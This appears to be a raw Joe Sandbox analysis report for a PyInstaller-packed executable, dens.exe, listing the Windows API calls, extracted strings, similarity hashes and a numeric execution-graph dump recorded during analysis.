                                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF62C104F11,?,?,?,?,00007FF62C10A48A,?,?,?,?,00007FF62C10718F), ref: 00007FF62C10B33A
                                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF62C104F11,?,?,?,?,00007FF62C10A48A,?,?,?,?,00007FF62C10718F), ref: 00007FF62C10B34B
                                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF62C104F11,?,?,?,?,00007FF62C10A48A,?,?,?,?,00007FF62C10718F), ref: 00007FF62C10B35C
                                                                                                                                                                                                                                              • SetLastError.KERNEL32(?,?,?,00007FF62C104F11,?,?,?,?,00007FF62C10A48A,?,?,?,?,00007FF62C10718F), ref: 00007FF62C10B377
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Value$ErrorLast
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2506987500-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF62C0F1B6A), ref: 00007FF62C0F295E
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                                              • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                                                                                                                                                                              • API String ID: 2050909247-2962405886
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                                              • String ID: Unhandled exception in script
                                                                                                                                                                                                                                              • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF62C0F918F,?,00007FF62C0F3C55), ref: 00007FF62C0F2BA0
                                                                                                                                                                                                                                              • MessageBoxW.USER32 ref: 00007FF62C0F2C2A
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentMessageProcess
                                                                                                                                                                                                                                              • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                                                                                                                                                              • API String ID: 1672936522-3797743490
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF62C0F1B99), ref: 00007FF62C0F2760
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                                              • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                              • API String ID: 2050909247-1591803126
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
• Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _set_statfp
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1156100317-0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • FlsGetValue.KERNEL32(?,?,?,00007FF62C10A5A3,?,?,00000000,00007FF62C10A83E,?,?,?,?,?,00007FF62C10A7CA), ref: 00007FF62C10B3AF
                                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF62C10A5A3,?,?,00000000,00007FF62C10A83E,?,?,?,?,?,00007FF62C10A7CA), ref: 00007FF62C10B3CE
                                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF62C10A5A3,?,?,00000000,00007FF62C10A83E,?,?,?,?,?,00007FF62C10A7CA), ref: 00007FF62C10B3F6
                                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF62C10A5A3,?,?,00000000,00007FF62C10A83E,?,?,?,?,?,00007FF62C10A7CA), ref: 00007FF62C10B407
                                                                                                                                                                                                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF62C10A5A3,?,?,00000000,00007FF62C10A83E,?,?,?,?,?,00007FF62C10A7CA), ref: 00007FF62C10B418
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Value
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3702945584-0
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Value
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3702945584-0
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID: verbose
                                                                                                                                                                                                                                              • API String ID: 3215553584-579935070
                                                                                                                                                                                                                                              • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                              • Instruction ID: ef05407b4b7fce76a600297e839262fe213be2094b9ebd134a9a78217a82eb1d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BF91D472A08A5681FF619E24DC5A3BD3791AF81BA4F444136DE5D873D6DF3CE8258302
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
Memory Dump Source
• Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
• Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                              • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                                                              • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                              • String ID: MOC$RCC
                                                                                                                                                                                                                                              • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                              • String ID: csm$csm
                                                                                                                                                                                                                                              • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Message
                                                                                                                                                                                                                                              • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                                                                                                                                                                              • API String ID: 2030045667-255084403
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2718003287-0
                                                                                                                                                                                                                                              • Opcode ID: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                                                                                                                                                              • Instruction ID: d5963c906391e85ea99114f779c0114a698e1561d3d64e507fde88feabfeb877
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 61D12972B18E418AEB10CF69D8551EC3771FB147A8B044236DE4ED7B99DE38D02ACB06
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
• Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1956198572-0
                                                                                                                                                                                                                                              • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                              • Instruction ID: 676343a545536e242cd7a8e561d9ca1aa7b8748dc7a10c2edd1c8ccda047082e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5E11E931A0C14246FE54876EED492B95251FB9CBA0F448030DF4987B9ACE2ED8D18249
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID: ?
                                                                                                                                                                                                                                              • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                                              • Opcode ID: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
                                                                                                                                                                                                                                              • Instruction ID: e16b7157366fe57095c0bb03f24a9810d1c99c74d3f40d8e6cdd428172d177c9
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AA412712A0868246FF609B29DC4B37A6761EBA0BB4F144235EE5C87BD5DFBCD4418702
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • _invalid_parameter_noinfo.LIBCMT ref: 00007FF62C109046
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C10A948: RtlFreeHeap.NTDLL(?,?,?,00007FF62C112D22,?,?,?,00007FF62C112D5F,?,?,00000000,00007FF62C113225,?,?,?,00007FF62C113157), ref: 00007FF62C10A95E
                                                                                                                                                                                                                                                • Part of subcall function 00007FF62C10A948: GetLastError.KERNEL32(?,?,?,00007FF62C112D22,?,?,?,00007FF62C112D5F,?,?,00000000,00007FF62C113225,?,?,?,00007FF62C113157), ref: 00007FF62C10A968
                                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF62C0FCBA5), ref: 00007FF62C109064
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID: C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                              • API String ID: 3580290477-1397442068
                                                                                                                                                                                                                                              • Opcode ID: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
                                                                                                                                                                                                                                              • Instruction ID: be9582ce97e79338b5047bd0e071fd5532c7b29ea535b0458c94f7403486979f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 22418D32A08A4285EF15AF25AC5A0BD63A4EF557F4F554035ED4E87B8ADE3CE4A1C301
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                              • String ID: U
                                                                                                                                                                                                                                              • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                              • Opcode ID: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                                              • Instruction ID: 8f17ead97d17a737c931a5056be74890f61cb4d4399002a299bd428731deaf78
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FA41E532B18A8185DB20CF29E8593AA6760FB987A4F444131EE4DC7784EF3CD455CB42
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentDirectory
                                                                                                                                                                                                                                              • String ID: :
                                                                                                                                                                                                                                              • API String ID: 1611563598-336475711
                                                                                                                                                                                                                                              • Opcode ID: 9aa1b1c0966d0181e71a7442aa19fd9d8a3a06258be719e39fc35e3b215e25b0
                                                                                                                                                                                                                                              • Instruction ID: 985ab0652be958d71ff8548b852eba62ebf5bbecd17fd7d44c1f58a28d9b6dfd
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9aa1b1c0966d0181e71a7442aa19fd9d8a3a06258be719e39fc35e3b215e25b0
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A6213162B0868181EF208B15D84A22D73B1FB88B94F864035DE8C83684DF7DE9968B42
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                                                              • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                              • Opcode ID: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                                                                                                              • Instruction ID: ee375455ade081ab3cff36d53b82a03997399dda6a45a8be90c705f646def659
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0B115E32608B8182EF218F19E84025977E5FB88B94F184234DF8D47754DF7DD591C700
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2073997997.00007FF62C0F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF62C0F0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2073965798.00007FF62C0F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074038376.00007FF62C11B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C12E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074075607.00007FF62C132000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2074141788.00007FF62C134000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID: :
                                                                                                                                                                                                                                              • API String ID: 2595371189-336475711
                                                                                                                                                                                                                                              • Opcode ID: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                                              • Instruction ID: 060f8aca37f7101514ec1ade1686fe941e9f572bbcd19a4c234d8adc1b82e3bd
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8701D421D1860285FF30AF64A86B27E27A0EF58764F800036D98CC2681DF6CD5048B06

                                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                                              Execution Coverage:3.7%
                                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                              Signature Coverage:0.1%
                                                                                                                                                                                                                                              Total number of Nodes:1415
                                                                                                                                                                                                                                              Total number of Limit Nodes:93
68697 7ffdfab8bb90 68675->68697 68679 7ffdfab8e2a6 68677->68679 68686 7ffdfab8e444 68677->68686 68710 7ffdfab8e090 11 API calls 68677->68710 68680 7ffdfab8bb20 9 API calls 68679->68680 68681 7ffdfab8e2c8 68679->68681 68682 7ffdfab8e389 68680->68682 68681->68686 68713 7ffdfab79330 16 API calls 68681->68713 68684 7ffdfab8e399 68682->68684 68685 7ffdfab8bb90 36 API calls 68682->68685 68684->68681 68711 7ffdfab8e090 11 API calls 68684->68711 68685->68684 68686->68652 68688 7ffdfab8e3bd 68688->68681 68712 7ffdfab8c330 39 API calls new[] 68688->68712 68690->68668 68692 7ffdfab8bb3f 68691->68692 68693 7ffdfab8bb4a RaiseException 68692->68693 68694 7ffdfab8bb7b 68692->68694 68693->68694 68695 7ffdfaca2bc0 8 API calls 68694->68695 68696 7ffdfab8bb88 68695->68696 68696->68658 68698 7ffdfab8bbb6 68697->68698 68699 7ffdfab8bc02 68697->68699 68700 7ffdfab765b0 16 API calls 68698->68700 68701 7ffdfab8bc08 68699->68701 68702 7ffdfab8bc4e 68699->68702 68703 7ffdfab8bbca 68700->68703 68704 7ffdfab76160 new[] 16 API calls 68701->68704 68709 7ffdfab7f3a0 34 API calls 68702->68709 68705 7ffdfab8bbde memset 68703->68705 68706 7ffdfab8bbd2 68703->68706 68707 7ffdfab8bc12 68704->68707 68705->68699 68706->68677 68707->68706 68708 7ffdfab8bc1a memset 68707->68708 68708->68706 68709->68706 68710->68679 68711->68688 68712->68681 68713->68686 68715 7ffdfab8802f 68714->68715 68716 7ffdfab8803c 68714->68716 68725 7ffdfab8ef40 37 API calls 68715->68725 68718 7ffdfab8804c 68716->68718 68719 7ffdfab7d970 25 API calls 68716->68719 68718->68606 68719->68718 68720->68601 68721->68606 68722->68601 68723->68610 68724->68614 68725->68716 68727 7ffdfab8b923 68726->68727 68729 7ffdfab8b95e 68727->68729 68730 7ffdfab8ca40 68727->68730 68729->68618 68731 7ffdfab76160 new[] 16 API calls 68730->68731 68732 7ffdfab8ca86 68731->68732 68733 7ffdfab8ca92 memset 68732->68733 68734 7ffdfab8cb00 68732->68734 68736 7ffdfab7ff80 68733->68736 68734->68729 68744 7ffdfab7ffd1 68736->68744 68737 7ffdfab7cfb0 17 API calls 
68737->68744 68739 7ffdfaca2bc0 8 API calls 68740 7ffdfab805f7 68739->68740 68740->68734 68741 7ffdfab801a0 CreateFileW 68741->68744 68744->68737 68744->68741 68745 7ffdfab80425 68744->68745 68747 7ffdfab80358 68744->68747 68750 7ffdfab7f9a0 25 API calls new[] 68744->68750 68751 7ffdfab807b0 22 API calls 68744->68751 68752 7ffdfab79330 16 API calls 68744->68752 68753 7ffdfab7d7a0 21 API calls 68745->68753 68747->68739 68748 7ffdfab80450 68754 7ffdfac35c70 16 API calls 68748->68754 68750->68744 68751->68744 68752->68744 68753->68748 68754->68747 68755->68620 68765 7ffdfab76ea0 68756->68765 68758 7ffdfab79116 68759 7ffdfab7912f 68758->68759 68777 7ffdfab76c20 16 API calls 68758->68777 68761 7ffdfaca2bc0 8 API calls 68759->68761 68764 7ffdfab79142 68761->68764 68764->68290 68766 7ffdfab76ee9 68765->68766 68770 7ffdfab785f6 68766->68770 68771 7ffdfab76f73 68766->68771 68772 7ffdfab76f63 68766->68772 68775 7ffdfab76f71 68766->68775 68767 7ffdfaca2bc0 8 API calls 68768 7ffdfab78633 68767->68768 68768->68758 68776 7ffdfab78cb0 16 API calls new[] 68768->68776 68770->68767 68774 7ffdfab76f77 memcpy 68771->68774 68771->68775 68778 7ffdfab78be0 16 API calls 68772->68778 68774->68775 68775->68770 68779 7ffdfab78be0 16 API calls 68775->68779 68776->68758 68777->68759 68778->68775 68779->68770 68781 7ffdfabf5378 68780->68781 68782 7ffdfabf53ce 68780->68782 68822 7ffdfab79330 16 API calls 68781->68822 68782->68781 68783 7ffdfabf53f0 68782->68783 68784 7ffdfabf5390 68783->68784 68790 7ffdfabf53f5 68783->68790 68823 7ffdfab79330 16 API calls 68784->68823 68787 7ffdfabf53ba 68787->68309 68788 7ffdfabf4d90 94 API calls 68788->68790 68789 7ffdfabf54ed 68789->68309 68790->68788 68790->68789 68791 7ffdfabdb0f0 18 API calls 68790->68791 68791->68790 68793 7ffdfaba8fa7 68792->68793 68794 7ffdfaba8f94 68792->68794 68796 7ffdfaba8fbd 68793->68796 68840 7ffdfab79330 16 API calls 68793->68840 68839 7ffdfab79330 16 API calls 68794->68839 68797 7ffdfaba8fa5 68796->68797 68799 7ffdfaba9001 
68796->68799 68841 7ffdfab79330 16 API calls 68797->68841 68824 7ffdfaba8cf0 68799->68824 68802 7ffdfaba8ff4 68802->68309 68805 7ffdfaba9086 68810 7ffdfaba9092 68805->68810 68844 7ffdfaba14a0 19 API calls 68805->68844 68806 7ffdfaba9025 68806->68805 68808 7ffdfaba8cf0 86 API calls 68806->68808 68809 7ffdfaba9081 68806->68809 68842 7ffdfabf5560 94 API calls 68806->68842 68843 7ffdfaba7e60 86 API calls 68806->68843 68808->68806 68809->68309 68810->68809 68811 7ffdfab76860 16 API calls 68810->68811 68812 7ffdfaba910b 68811->68812 68812->68809 68813 7ffdfaba9113 memcpy 68812->68813 68813->68809 68814->68294 68815->68297 68816->68309 68817->68309 68818->68309 68819->68296 68820->68296 68821->68305 68822->68784 68823->68787 68825 7ffdfaba8d65 68824->68825 68833 7ffdfaba8d0d 68824->68833 68827 7ffdfaba8de5 68825->68827 68828 7ffdfaba8dde 68825->68828 68826 7ffdfaba8d2c 68826->68825 68832 7ffdfaba8d35 68826->68832 68845 7ffdfababd50 68827->68845 68854 7ffdfaba3e40 20 API calls 68828->68854 68838 7ffdfaba8dfd 68832->68838 68853 7ffdfaba5860 20 API calls 68832->68853 68833->68825 68833->68826 68852 7ffdfaba7e60 86 API calls 68833->68852 68835 7ffdfaba8d56 68835->68806 68836 7ffdfaba8de3 68836->68838 68855 7ffdfaba5860 20 API calls 68836->68855 68838->68806 68839->68797 68840->68796 68841->68802 68842->68806 68843->68806 68844->68810 68846 7ffdfababde6 68845->68846 68851 7ffdfababe6e 68846->68851 68856 7ffdfab76c20 16 API calls 68846->68856 68848 7ffdfabb2498 68857 7ffdfaba1e20 16 API calls 68848->68857 68850 7ffdfabb24a7 68850->68836 68852->68833 68853->68835 68854->68836 68855->68838 68856->68848 68857->68850 68858->68329 68860 7ffdfabafa36 68861 7ffdfabafa69 68860->68861 68862 7ffdfabafa54 68860->68862 68884 7ffdfab95d30 68861->68884 68896 7ffdfabb69a0 31 API calls 68862->68896 68867 7ffdfabb1b0d 68868 7ffdfabafa60 68868->68867 68871 7ffdfabb1f45 68868->68871 68898 7ffdfab79330 16 API calls 68868->68898 68869 7ffdfabb253b 68900 7ffdfab79330 16 API calls 68869->68900 
68871->68869 68899 7ffdfaba1e20 16 API calls 68871->68899 68874 7ffdfabb2586 68875 7ffdfabb2597 68874->68875 68901 7ffdfaba54b0 82 API calls 68874->68901 68877 7ffdfabb25a8 68875->68877 68902 7ffdfab76c20 16 API calls 68875->68902 68881 7ffdfabb2054 68877->68881 68903 7ffdfabd1350 18 API calls 68877->68903 68880 7ffdfaca2bc0 8 API calls 68882 7ffdfabb2663 68880->68882 68881->68880 68883 7ffdfabb2087 68881->68883 68886 7ffdfab95e05 68884->68886 68889 7ffdfab95d57 68884->68889 68885 7ffdfab95d5d 68891 7ffdfab95e0a 68885->68891 68892 7ffdfab95ea7 68885->68892 68893 7ffdfab95eb3 68885->68893 68886->68891 68904 7ffdfab91ed0 68886->68904 68888 7ffdfab95edc 68915 7ffdfab79330 16 API calls 68888->68915 68889->68885 68889->68888 68889->68891 68891->68868 68897 7ffdfab95f20 53 API calls 68891->68897 68913 7ffdfac35c30 16 API calls 68892->68913 68914 7ffdfab95b20 53 API calls 68893->68914 68896->68868 68897->68868 68898->68871 68899->68869 68900->68874 68901->68875 68902->68877 68903->68881 68905 7ffdfab91eed 68904->68905 68906 7ffdfab91f34 68904->68906 68916 7ffdfab79330 16 API calls 68905->68916 68912 7ffdfab8a080 53 API calls 68906->68912 68908 7ffdfab91f1e 68908->68889 68909 7ffdfab91f45 68911 7ffdfab91f49 68909->68911 68917 7ffdfab91ba0 16 API calls 68909->68917 68911->68889 68912->68909 68913->68891 68914->68891 68915->68891 68916->68908 68917->68911 68918 7ff62c0f2fe0 68919 7ff62c0f2ff0 68918->68919 68920 7ff62c0f3041 68919->68920 68921 7ff62c0f302b 68919->68921 68923 7ff62c0f3061 68920->68923 68933 7ff62c0f3077 __std_exception_destroy 68920->68933 68980 7ff62c0f2710 54 API calls _log10_special 68921->68980 68981 7ff62c0f2710 54 API calls _log10_special 68923->68981 68925 7ff62c0fc550 _log10_special 8 API calls 68926 7ff62c0f31fa 68925->68926 68928 7ff62c0f3349 68988 7ff62c0f2710 54 API calls _log10_special 68928->68988 68931 7ff62c0f3333 68987 7ff62c0f2710 54 API calls _log10_special 68931->68987 68933->68928 68933->68931 68934 7ff62c0f330d 68933->68934 68936 
